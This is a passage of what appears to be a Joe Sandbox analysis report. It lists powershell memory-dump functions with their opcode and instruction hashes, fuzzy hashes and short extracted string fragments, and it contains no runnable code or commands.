                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a77db417faddccda80fa181d8a8ac7c630d0f9a595ea361c6c95b6a377b670b0
                                                                                                        • Instruction ID: 4c01ee9b1cb82d7406ba874027ecf47ed787961b6695265bf9dc5c62040eb412
                                                                                                        • Opcode Fuzzy Hash: a77db417faddccda80fa181d8a8ac7c630d0f9a595ea361c6c95b6a377b670b0
                                                                                                        • Instruction Fuzzy Hash: 68815D3071DA4D4FE799EB5CC8A4AB5B7D1FF99350B1005BDD08AC72A6DA25F842CB40
                                                                                                        Function 00007FFD9B9741E7 Relevance: .2, Instructions: 156COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2671780888.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c6ac3b759373d975821fa3938a1e72f9d3677ac649c0458470be19bcaf8a1747
                                                                                                        • Instruction ID: 11cf05d65b1d6ca15b8fa259b7f011a9e83776a57cebfaa7e7efa191c0d45d10
                                                                                                        • Opcode Fuzzy Hash: c6ac3b759373d975821fa3938a1e72f9d3677ac649c0458470be19bcaf8a1747
                                                                                                        • Instruction Fuzzy Hash: EE51E162B2FA8A1FE7A5D66848B17BC67D1EF51360B5A00BED06CC72E3DD18A8008301
                                                                                                        Function 00007FFD9B975352 Relevance: .1, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2671780888.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5372ba07d1626cec703bed7477e8577cb33db648baf9486c6150a35676965b6e
                                                                                                        • Instruction ID: 007efd201f7732e203b1ea79d70302ea5c2bdb67aec92082998a74830aab87a1
                                                                                                        • Opcode Fuzzy Hash: 5372ba07d1626cec703bed7477e8577cb33db648baf9486c6150a35676965b6e
                                                                                                        • Instruction Fuzzy Hash: D3310622F2FACA6BF7F597A818B217867C1EF10624B6901BAD45DCB1F3ED086C014242
                                                                                                        Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2670314072.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                        • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45

                                                                                                        Executed Functions

                                                                                                        Function 04BBE928 Relevance: .3, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8d55011e1ae1dcf6ca69ffcadf8592ba7ee8c1f9a1e44bd31a21f17a9cfec4f
                                                                                                        • Instruction ID: b0957932d784295690f95fbebb6c1fa0695971cfca8c862e34471c61925243ff
                                                                                                        • Opcode Fuzzy Hash: f8d55011e1ae1dcf6ca69ffcadf8592ba7ee8c1f9a1e44bd31a21f17a9cfec4f
                                                                                                        • Instruction Fuzzy Hash: 54B13D70E002099FDB14CFA9C8857EDBBF2FF88314F148569D855A7264EBB4E846CB91
                                                                                                        Function 04BBF1F8 Relevance: .3, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2178086325.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4bb0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08282ef5fde09cb7491cdbdd2ecc68cf6bf9093678ed028b00a71e6f478e3081
                                                                                                        • Instruction ID: 04e878bdaa6a198b9d4b3f2e0dd581c83030907ec7c43abf8c899a57db64936e
                                                                                                        • Opcode Fuzzy Hash: 08282ef5fde09cb7491cdbdd2ecc68cf6bf9093678ed028b00a71e6f478e3081
                                                                                                        • Instruction Fuzzy Hash: DBB12A70E002098FDF14CFA9D8857FDBBF2EB88314F148569E859E7254EBB4A845CB81
                                                                                                        Function 07AA58E0 Relevance: 26.0, Strings: 20, Instructions: 1045COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.fk$-fk
                                                                                                        • API String ID: 0-963328035
                                                                                                        • Opcode ID: cc738f54f00a438fab7418067e674913f6571e18589fdea4c9b1ace7aff2d1a2
                                                                                                        • Instruction ID: 04e9d93a49333642e5cb9423f913fc796b9cb234b31e25180a7b523f41f3aa06
                                                                                                        • Opcode Fuzzy Hash: cc738f54f00a438fab7418067e674913f6571e18589fdea4c9b1ace7aff2d1a2
                                                                                                        • Instruction Fuzzy Hash: B792B0B0E00315EFCB24DF68C950B6ABBB2AF85314F1484AAD8159B355CB32DD95CF91
                                                                                                        Function 07AAB7BD Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$x.fk$x.fk$-fk$-fk
                                                                                                        • API String ID: 0-3782596426
                                                                                                        • Opcode ID: d10093f56fa0c0cf118142d7486a1f1a9a742c4fdab6bd6018b4b7c7b53aa27a
                                                                                                        • Instruction ID: 975f62c3a70422bc3eb12316cd86cace347ed2b96304f3aa11cb4f5dddd806c2
                                                                                                        • Opcode Fuzzy Hash: d10093f56fa0c0cf118142d7486a1f1a9a742c4fdab6bd6018b4b7c7b53aa27a
                                                                                                        • Instruction Fuzzy Hash: C76280B4A01218DFDB24DF18C950BDEBBB2BB84304F5081E9D9096F395CB71AE858F91
                                                                                                        Function 07AA2808 Relevance: 15.6, Strings: 12, Instructions: 568COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-879563280
                                                                                                        • Opcode ID: a8bbcd9ed8fb36db9599ce5fc8861ea146ba79c94daba7d82cd180f9c99a1566
                                                                                                        • Instruction ID: dc17e508e4aeace78bfc94cb49b3e6d91d43855fac1037c674c7211b707454ab
                                                                                                        • Opcode Fuzzy Hash: a8bbcd9ed8fb36db9599ce5fc8861ea146ba79c94daba7d82cd180f9c99a1566
                                                                                                        • Instruction Fuzzy Hash: 111209B1705306AFCB258F29D81476ABBB1BFC5210F1484ABE425CF2D6DB31C9A5C7A1
                                                                                                        Function 07AAE150 Relevance: 15.5, Strings: 12, Instructions: 531COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-977795093
                                                                                                        • Opcode ID: f33931a31acb19f36d7ab64dbdc1b32afd6e6263641b128b9daed805de186a6e
                                                                                                        • Instruction ID: 51337564aa86e4f6cf59d9756b5a14cf54680898cbed4c86f2cc6574a8ae8a27
                                                                                                        • Opcode Fuzzy Hash: f33931a31acb19f36d7ab64dbdc1b32afd6e6263641b128b9daed805de186a6e
                                                                                                        • Instruction Fuzzy Hash: 5B1217B1B04215EFCB14CF68C542AAABBF2AFC9310F14806AD8259F355DB32DD45CBA1
                                                                                                        Function 07AA4770 Relevance: 11.7, Strings: 9, Instructions: 465COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful$84sl$84sl$tP^q$tP^q$x.fk
                                                                                                        • API String ID: 0-949314092
                                                                                                        • Opcode ID: 3ec301051f06c3c03593732d79a7da67b609ca5b948f3bd16c85635fe472ab02
                                                                                                        • Instruction ID: 0579f742d1fd10a6ef3df03e76413ea3d132efb5ca4e2c62c3363d034d7553ba
                                                                                                        • Opcode Fuzzy Hash: 3ec301051f06c3c03593732d79a7da67b609ca5b948f3bd16c85635fe472ab02
                                                                                                        • Instruction Fuzzy Hash: 0202EFB4B00245AFC714DF68C951FAABBE2AFC8314F148469E8159F395CBB2EC51CB91
                                                                                                        Function 07AA4DB8 Relevance: 10.7, Strings: 8, Instructions: 741COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful
                                                                                                        • API String ID: 0-2454659252
                                                                                                        • Opcode ID: bf45e2514b363dd2834e9fea04e1c3acbc7761c74959629be35d47ca37f63275
                                                                                                        • Instruction ID: 43a7a3e8829dc385a7473b0d758fce76a9edce53fecdf68f12a8a9c5e026d5e9
                                                                                                        • Opcode Fuzzy Hash: bf45e2514b363dd2834e9fea04e1c3acbc7761c74959629be35d47ca37f63275
                                                                                                        • Instruction Fuzzy Hash: 856247B4F00215EFDB14CB98C941E6ABBB2BB88304F24C069D9199F365CB72ED55CB85
                                                                                                        Function 07AA7350 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$-fk
                                                                                                        • API String ID: 0-3003281799
                                                                                                        • Opcode ID: a621d6b15a6a8333a4439e1a9084bc764bba0d54805f09736751dfcfea7330f8
                                                                                                        • Instruction ID: fd1d254a84d629f5c92cb94e2a07baf24cb96bd936e0f355419d59f395ee6e4a
                                                                                                        • Opcode Fuzzy Hash: a621d6b15a6a8333a4439e1a9084bc764bba0d54805f09736751dfcfea7330f8
                                                                                                        • Instruction Fuzzy Hash: D2D16EB4A402099FCB14DF68C551FAEBBB2AB88304F11C469D9116F395CF72EC85CB92
                                                                                                        Function 07AAB288 Relevance: 10.3, Strings: 8, Instructions: 329COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$x.fk$-fk
                                                                                                        • API String ID: 0-3003281799
                                                                                                        • Opcode ID: 49d5252dbf0c3444fe8c7d5180aa1689cbb3a124f28bc02206e14e29a739887b
                                                                                                        • Instruction ID: d42832c37ea158269470f7442e9dccec40ab565bc8876e41220710a0a10b929b
                                                                                                        • Opcode Fuzzy Hash: 49d5252dbf0c3444fe8c7d5180aa1689cbb3a124f28bc02206e14e29a739887b
                                                                                                        • Instruction Fuzzy Hash: FBE149B4A41218DFDB24DB28C950BDEBBB2BB85304F5081E5D9096B395CB31AEC5CF91
                                                                                                        Function 07AA62F3 Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$4'^q$4'^q$x.fk$x.fk$-fk
                                                                                                        • API String ID: 0-665962619
                                                                                                        • Opcode ID: b8a4e167cf1d5b70c692ab143c01815165299fc495f41a23a6fa97f128a0334c
                                                                                                        • Instruction ID: 57988e3beef8eef02f52c035b72590189223f76cd943fefa368384e5d2308759
                                                                                                        • Opcode Fuzzy Hash: b8a4e167cf1d5b70c692ab143c01815165299fc495f41a23a6fa97f128a0334c
                                                                                                        • Instruction Fuzzy Hash: A0F1A0B0A40215DFDB64DB18C951F6ABBB3AB84304F14C0A9D9096F395CB72ED868F91
                                                                                                        Function 07AACBF1 Relevance: 7.9, Strings: 6, Instructions: 397COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$4'^q$4'^q$x.fk$x.fk
                                                                                                        • API String ID: 0-3742230645
                                                                                                        • Opcode ID: b29320856744aadf9ad731be52d7139f8378d795126c5439486b9d7613718262
                                                                                                        • Instruction ID: 599298587402ab8afe8c16313c4d69ff1a224545f1efe5904efd0c3fd5a5581e
                                                                                                        • Opcode Fuzzy Hash: b29320856744aadf9ad731be52d7139f8378d795126c5439486b9d7613718262
                                                                                                        • Instruction Fuzzy Hash: 1E026BB4A00228DFD724DB28C950BEEBBB2BB85304F5081E5D9096B755CB71AE85CF91
                                                                                                        Function 07AABEE0 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$4'^q$4'^q$x.fk$x.fk$-fk
                                                                                                        • API String ID: 0-4048625476
                                                                                                        • Opcode ID: f36fd956350e6ce679ce6c638ff89f5d1eacf5b27298a10bc89b9d293e3e0671
                                                                                                        • Instruction ID: 897a36933557fb34a2315d9c785a348e92a3797def8b9ac961da1979796ecf7b
                                                                                                        • Opcode Fuzzy Hash: f36fd956350e6ce679ce6c638ff89f5d1eacf5b27298a10bc89b9d293e3e0671
                                                                                                        • Instruction Fuzzy Hash: 4FE1B2B4A412149FD714EB28CD54BAEBBB3EB84304F5080E9D9096F391CB75EE858F91
                                                                                                        Function 07AA0638 Relevance: 7.8, Strings: 6, Instructions: 327COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                                                        • API String ID: 0-3669853574
                                                                                                        • Opcode ID: 6d02708adb084bd0fa30c1e0da830a45bb65f364895c3abdbed431eec4776ba8
                                                                                                        • Instruction ID: b8bf67e78c330324536996fcac9dba3e945f6c8cc50cc4522df95921ddb0585a
                                                                                                        • Opcode Fuzzy Hash: 6d02708adb084bd0fa30c1e0da830a45bb65f364895c3abdbed431eec4776ba8
                                                                                                        • Instruction Fuzzy Hash: F1B138B1B04216EFDB148B69D940A7BBBF6EFC5314F14806AD4248F255EF32C845CBA2
                                                                                                        Function 07AA0DE0 Relevance: 6.8, Strings: 5, Instructions: 549COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful$(ful$`Bgk
                                                                                                        • API String ID: 0-2649058339
                                                                                                        • Opcode ID: dc7d62a81be32529f6da1edd317a7858f49005589f080ff2702ef49a6676c37d
                                                                                                        • Instruction ID: 3a941b01cc7934618d23cc62abf6fd5aaf185a31ab514603359ef932734efad8
                                                                                                        • Opcode Fuzzy Hash: dc7d62a81be32529f6da1edd317a7858f49005589f080ff2702ef49a6676c37d
                                                                                                        • Instruction Fuzzy Hash: 76227FB4B00209EFDB54CB98C941A6ABBF2AFC9314F14C069D8199F755DB72EC42CB91
                                                                                                        Function 07AA7332 Relevance: 6.5, Strings: 5, Instructions: 295COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$4'^q$x.fk$-fk
                                                                                                        • API String ID: 0-1095101070
                                                                                                        • Opcode ID: 4df268db3b6161d1ba88b234b16b8aac0c2c7cbf6a92d8e3fe8bc3b6c7858eea
                                                                                                        • Instruction ID: a687c787a19e2ec33db18c9da0694cf58c60624205441c5cf7040047766939c7
                                                                                                        • Opcode Fuzzy Hash: 4df268db3b6161d1ba88b234b16b8aac0c2c7cbf6a92d8e3fe8bc3b6c7858eea
                                                                                                        • Instruction Fuzzy Hash: CAC17DB4A00205AFCB14DF68C551FAEBBB2EB88304F15C469D9116F395CB76E885CB91
                                                                                                        Function 07AA4D9B Relevance: 4.3, Strings: 3, Instructions: 554COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful
                                                                                                        • API String ID: 0-3290164086
                                                                                                        • Opcode ID: f96e446d909503ddd2606311ec4a4b872f6092d0caef8df640ea0c7ab2383566
                                                                                                        • Instruction ID: dce7259f174124e90d46c34d2a8f40f0b7ab96a5f9b0b0dc63d4197bda42e402
                                                                                                        • Opcode Fuzzy Hash: f96e446d909503ddd2606311ec4a4b872f6092d0caef8df640ea0c7ab2383566
                                                                                                        • Instruction Fuzzy Hash: 4F3238B4E00215EFDB14CB98C940EA9BBB2FB88304F15C0A9D9299F365CB72ED55CB45
                                                                                                        Function 07AA552D Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$(ful
                                                                                                        • API String ID: 0-3290164086
                                                                                                        • Opcode ID: 0bc3730bcecb769c50558594b95ca53eba1a5eb38e9677b2d78606fe92e43cb7
                                                                                                        • Instruction ID: 6c2ea845cc1502362a8dbae50b86c88d020b3b9d9be748d76fdde7397e0a08cb
                                                                                                        • Opcode Fuzzy Hash: 0bc3730bcecb769c50558594b95ca53eba1a5eb38e9677b2d78606fe92e43cb7
                                                                                                        • Instruction Fuzzy Hash: C31236B4E00215EFDB14CF98C941EA9BBB2BB84304F24C069D9299F365CB72ED55CB85
                                                                                                        Function 07AA12ED Relevance: 4.2, Strings: 3, Instructions: 434COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful$h2hk
                                                                                                        • API String ID: 0-1437781144
                                                                                                        • Opcode ID: 3d0750ebc403c63588b5b8d9667316fececb01a7aaa46fd4bc4dfa97b3d952e9
                                                                                                        • Instruction ID: eba749800fd471b701c6091676a3221339407a26a25f8389a75c88a9d754f4df
                                                                                                        • Opcode Fuzzy Hash: 3d0750ebc403c63588b5b8d9667316fececb01a7aaa46fd4bc4dfa97b3d952e9
                                                                                                        • Instruction Fuzzy Hash: C3024CB4A00209EFDB14CF98C541EAABBF2AF88348F14C069E9159B751D772ED42CB91
                                                                                                        Function 07AA0DC7 Relevance: 2.9, Strings: 2, Instructions: 408COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful$(ful
                                                                                                        • API String ID: 0-51623107
                                                                                                        • Opcode ID: f47c4da6b2f7fc75aabeeed501298c759516a53cd6d8705d9e318d74284ee13d
                                                                                                        • Instruction ID: e091051549a3f172207b98e6bc1309930e3f97b404eaafc575dd0a7a0e55c250
                                                                                                        • Opcode Fuzzy Hash: f47c4da6b2f7fc75aabeeed501298c759516a53cd6d8705d9e318d74284ee13d
                                                                                                        • Instruction Fuzzy Hash: 0EF13CB4A00219EFDB14CF98C541EAABBF2BF89314F14C169D819AB751D772EC41CB91
                                                                                                        Function 07AA2F67 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84sl$tP^q
                                                                                                        • API String ID: 0-1867222971
                                                                                                        • Opcode ID: e681ec39361431f5bb403c54b42b56faf06451f92398351c229dffd0cc8253ba
                                                                                                        • Instruction ID: 65d6bb6d4b5833fad13dfe0c7ab60b3069877476b4a750ca88c2b364fa1193d6
                                                                                                        • Opcode Fuzzy Hash: e681ec39361431f5bb403c54b42b56faf06451f92398351c229dffd0cc8253ba
                                                                                                        • Instruction Fuzzy Hash: 6F61F371A09385AFCB128B74C854A65BFB1AF83214B19C4DFE0548F293C736DC46C792
                                                                                                        Function 07AA08C2 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $^q
                                                                                                        • API String ID: 0-388095546
                                                                                                        • Opcode ID: 91992f55676b3a458e1402316f523cad4f975c7685a56a22698dad0b65ee5a83
                                                                                                        • Instruction ID: 098b8b92f39e9de580372fc002690ab6e200a3e144ab22818204d08496ee5865
                                                                                                        • Opcode Fuzzy Hash: 91992f55676b3a458e1402316f523cad4f975c7685a56a22698dad0b65ee5a83
                                                                                                        • Instruction Fuzzy Hash: 04812871B04346AFD7158B79C91066BBFB5AFC6310F1884AFE468CB252EB31C845C7A2
                                                                                                        Function 07AAE49D Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.2186204586.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7aa0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (ful
                                                                                                        • API String ID: 0-517230495
                                                                                                        • Opcode ID: 6cf6dcb8174f28e8c7ea419303c4dea99d858913eb44f78510ae2d56640a4b34
                                                                                                        • Instruction ID: 37b8bc25da0a9d33f9e5ee9c4673a6accec5cb53687c790c8adab353b1ea057b
                                                                                                        • Opcode Fuzzy Hash: 6cf6dcb8174f28e8c7ea419303c4dea99d858913eb44f78510ae2d56640a4b34
                                                                                                        • Instruction Fuzzy Hash: 028159B4A04205EFCB14CF58C586E99BBF2BF88324F1581A9D825AB355CB72ED41CF61
                                                                                                        Function 07AAE4B0 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
